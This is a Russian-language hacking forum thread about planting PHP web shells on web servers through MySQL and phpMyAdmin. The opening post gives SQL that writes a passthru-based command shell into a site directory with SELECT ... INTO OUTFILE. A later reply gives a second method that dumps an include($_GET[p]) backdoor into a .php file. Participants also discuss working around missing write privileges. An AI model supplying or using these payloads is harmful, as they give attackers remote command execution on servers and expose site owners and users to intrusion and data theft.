CREATE TABLE `shell` (s TEXT);
INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
SELECT `s` INTO OUTFILE '/svoi/puti/k/saity/shell.php' FROM `shell`;
DROP TABLE `shell`;

Эх жалко не хватает прав....

__________________
-=Ok let's Go=-
-=OpenVPN=-

Смотря на что прав не хватает, добавить строку можно к любой другой таблице. Только удалить ее не забудь потом. А если на инто аутфайл или запись, то хуже уже...

На инто вот и нету записи.

__________________
-=Ok let's Go=-
-=OpenVPN=-

SanyaX, Попробуй вот здесьпосмотреть:
http://www.ljplus.ru/img/_/c/_cybermind_/_1.jpg
http://www.ljplus.ru/img/_/c/_cybermind_/__1.jpg
http://www.ljplus.ru/img/_/c/_cybermind_/_2.jpg
http://www.ljplus.ru/img/_/c/_cybermind_/_3.jpg
Вроде бы было что-то про дыры в пхпмайадмин. Да и сама статья не плохая...

Может я тут не в тему, но всёравно подскажу...
Сначало в phpMyAdmin надо куда-то вписать значение <? include($_GET[p]) ?> потом использовать команду SELECT pass INTO OUTFILE 'c:/appserv/www/appserv/user.php' FROM user WHERE login = 'shell'
Думаю значение этого всего объяснять ненадо, вот только не помню как путь прописывать... /www/site/ или \www\site\